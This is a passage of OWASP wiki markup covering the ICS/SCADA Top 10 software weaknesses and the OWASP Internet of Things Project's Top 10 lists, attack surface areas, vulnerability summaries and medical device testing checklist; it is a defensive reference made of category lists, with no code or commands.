<br />
== ICS/SCADA Project ==<br />
<br />
The OWASP ICS/SCADA Top 10 software weaknesses are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Rank and ID<br />
! Title<br />
|- <br />
| '''1 - CWE-119'''<br />
|<br />
* Improper Restriction of Operations within the Bounds of a Memory Buffer<br />
|- <br />
| '''2 - CWE-20'''<br />
|<br />
* Improper Input Validation<br />
|- <br />
| '''3 - CWE-22'''<br />
|<br />
* Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')<br />
|-<br />
| '''4 - CWE-264'''<br />
|<br />
* Permissions, Privileges, and Access Controls<br />
|- <br />
| '''5 - CWE-200'''<br />
|<br />
* Information Exposure<br />
|- <br />
| '''6 - CWE-255'''<br />
|<br />
* Credentials Management<br />
|- <br />
| '''7 - CWE-287'''<br />
|<br />
* Improper Authentication<br />
|- <br />
| '''8 - CWE-399'''<br />
|<br />
* Resource Management Errors<br />
|- <br />
| '''9 - CWE-79'''<br />
|<br />
* Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')<br />
|- <br />
| '''10 - CWE-189'''<br />
|<br />
* Numeric Errors<br />
|- <br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the ICS/SCADA Project? ==<br />
<br />
The ICS/SCADA Project provides:<br />
<br />
* A list of the Top 10 most dangerous software weaknesses<br />
<br />
== Project Leaders ==<br />
<br />
* NJ Ouchn<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Community =<br />
<br />
[https://www.iamthecavalry.org/ I Am The Cavalry] <br />
<br />
A global grassroots organization that is focused on issues where computer security intersects public safety and human life.<br />
<br />
Their areas of focus include:<br />
* Medical devices<br />
* Automobiles<br />
* Home Electronics<br />
* Public Infrastructure<br />
<br />
[https://otalliance.org Online Trust Alliance]<br />
<br />
Formed as an informal industry working group in 2005, today OTA is an Internal Revenue Service (IRS) approved 501c3 charitable organization with the mission to enhance online trust and empower users, while promoting innovation and the vitality of the internet. OTA is global organization supported by over 100 organizations headquartered in Bellevue, Washington with offices in Washington DC.<br />
<br />
Addressing the mounting concerns, in January 2015 the Online Trust Alliance, established the [https://otalliance.org/initiatives/internet-things IoT Trustworthy Working Group (ITWG)], a multi-stakeholder initiative. The group recognizes “security and privacy by design” must be a priority from the onset of product development and be addressed holistically. The framework focuses on privacy, security sustainability. The sustainability pillar is critical as it looks at the life-cycle issues related to long- term supportability and transfers of ownership of devices and the data collected.<br />
<br />
[https://allseenalliance.org/framework AllSeen Alliance]<br />
<br />
The AllSeen Alliance is a Linux Foundation collaborative project. They're a cross-industry consortium dedicated to enabling the interoperability of billions of devices, services and apps that comprise the Internet of Things. The Alliance supports the AllJoyn Framework, an open source software framework that makes it easy for devices and apps to discover and communicate with each other. Developers can write applications for interoperability regardless of transport layer, manufacturer, and without the need for Internet access. The software has been and will continue to be openly available for developers to download, and runs on popular platforms such as Linux and Linux-based Android, iOS, and Windows, including many other lightweight real-time operating systems.<br />
<br />
[http://www.iiconsortium.org/ The Industrial Internet Consortium (IIC)]<br />
<br />
The Industrial Internet Consortium is the open membership, international not-for-profit consortium that is setting the architectural framework and direction for the Industrial Internet. Founded by AT&T, Cisco, GE, IBM and Intel in March 2014, the consortium’s mission is to coordinate vast ecosystem initiatives to connect and integrate objects with people, processes and data using common architectures, interoperability and open standards.<br />
<br />
[http://securingsmartcities.org/ Securing Smart Cities]<br />
<br />
Securing Smart Cities is a not-for-profit global initiative that aims to solve the existing and future cybersecurity problems of smart cities through collaboration between companies, governments, media outlets, other not-for-profit initiatives and individuals across the world.<br />
<br />
===Talks===<br />
<br />
RSA Conference San Francisco <br> <br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf Securing the Internet of Things: Mapping IoT Attack Surface Areas with the OWASP IoT Top 10 Project] <br><br />
Daniel Miessler, Practice Principal <br><br />
April 21, 2015 <br><br />
--- <br><br />
Defcon 23 <br><br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping] <br><br />
Daniel Miessler <br><br />
August 6-9, 2015<br />
<br />
===Podcasts===<br />
<br />
* [http://iotpodcast.com/ The Internet of Things Podcast]<br />
* [http://www.iot-inc.com/ IoT Inc]<br />
* [https://craigsmith.net/iot-this-week/ IoT This Week]<br />
* [http://farstuff.com/ Farstuff: The Internet of Things Podcast]<br />
<br />
===IoT Conferences===<br />
<br />
* [http://www.iotevents.org Internet of Things Events]<br />
<br />
Conference Call for Papers<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=internet+of+things&year=t WikiCFP - Internet of Things]<br />
* [http://www.wikicfp.com/cfp/servlet/tool.search?q=iot&year=t WikiCFP - IoT]<br />
<br />
<br />
<br />
=Project About=<br />
<br />
{{Template:Project About<br />
| project_name =OWASP Internet of Things Project<br />
| project_description = <br />
| project_license =CC-BY 3.0 for documentation and GPLv3 for code. <br />
| leader_name1 = Daniel Miessler<br />
| leader_email1 = <br />
| leader_username1 = <br />
| leader_name2 =Craig Smith<br />
| leader_email2 = <br />
| leader_username2 = <br />
| contributor_name1 = Justin Klein Keane]<br />
| contributor_email1 = <br />
| contributor_username1 = Justin_C._Klein_Keane<br />
| contributor_name2 = Yunsoul<br />
| contributor_email2 = <br />
| contributor_username2 = Yunsoul<br />
| mailing_list_name = <br />
| links_url1 = <br />
| links_name1 =<br />
}} <br />
<br />
<br />
<br />
__NOTOC__ <headertabs></headertabs><br />
<br />
[[Category:OWASP_Project]] <br />
[[Category:OWASP_Document]] <br />
[[Category:OWASP_Download]] <br />
[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=User:Aaron.guzman&diff=246165User:Aaron.guzman2018-12-19T18:56:53Z<p>Aaron.guzman: Replaced content with "@scriptingxss"</p>
<hr />
<div>@scriptingxss</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246164OWASP Internet of Things Project2018-12-19T18:53:40Z<p>Aaron.guzman: /* Classifications */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
==Get Involved!==<br />
<br />
The OWASP IoT Project is currently reviewing the Top Ten list for 2018. Provide your insight and expertise by joining the #iot-security channel meetups on Slack.<br />
<br />
==OWASP Internet of Things (IoT) Project==<br />
<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The OWASP IoT Project is currently reviewing the Top Ten list for 2018. The official launch date is December 2018. Provide your insight and expertise by joining the #iot-security channel meetups on Slack.<br />
* I1 Weak Guessable, or Hardcoded Passwords<br />
Use of easily bruteforced, publicly available, or unchangeable credentials, including backdoors in firmware or client software that grants unauthorized access to deployed systems. <br />
* I2 Insecure Network Services<br />
Unneeded or insecure network services running on the device itself, especially those exposed to the internet, that compromise the confidentiality, integrity/authenticity, or availability of information or allow unauthorized remote control.<br />
* I3 Insecure Ecosystem Interfaces<br />
Insecure web, backend API, cloud, or mobile interfaces in the ecosystem outside of the device that allows compromise of the device or its related components. Common issues include a lack of authentication/authorization, lacking or weak encryption, and a lack of input and output filtering.<br />
* I4 Lack of Secure Update Mechanism<br />
Lack of ability to securely update the device or ecosystem. This includes lack of firmware validation on device, lack of secure delivery (un-encrypted in transit), lack of anti-rollback mechanisms, lack of notifications of security changes due to updates.<br />
* I5 Use of Insecure or Outdated Components<br />
Use of deprecated and insecure software components/libraries that could allow the device to be compromised. Including insecure customization of operating systems, and the use of third-party software or hardware components from a compromised supply chain.<br />
* I6 Insufficient Privacy Protection<br />
User's personal information stored on the device or in the ecosystem that is used insecurely, improperly, or without permission.<br />
* I7 Insecure Data Transfer and Storage<br />
Lack of encryption or access control of sensitive data anywhere within the ecosystem, including at rest, in transit, or during processing.<br />
* I8 Lack of Device Management<br />
Lack of security support on existing devices deployed in production, including asset management, update management, and secure decommissioning.<br />
* I9 Insecure Default Settings<br />
Devices or systems that are shipped with insecure default settings or lack the capability to make the system more secure.<br />
* I10 Lack of Physical Hardening<br />
Lack of physical hardening measures, allowing potential attackers to gain sensitive information that can help in a future remote attack or take local control of the device.<br />
<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Verify for old sw versions and possible attacks (Heartbleed, Shellshock, old PHP versions etc)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of static same enc/dec key<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physicall)<br />
<br />
|-<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to '1234' or '123456' for example.<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented however it is improperly configured or is not being properly updated, e.g. using SSL v2 <br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* Service can be attacked in a way that denies service to that service or the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting a OTA update<br />
* Downloading from the manufacturers web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in a adapter<br />
|<br />
* Firmware contains a lot of useful information, like source code and binaries of running services, pre-set passwords, ssh keys etc. <br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With the help of a JTAG adapter and gdb we can modify the execution of firmware in the device and bypass almost all software based security controls.<br />
* Side channel attacks can also modify the execution flow or can be used to leak interesting information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, we will obtain full console access to a device<br />
* Usually security measures include custom bootloaders that prevent the attacker from entering single user mode, but that can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping Medical Device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
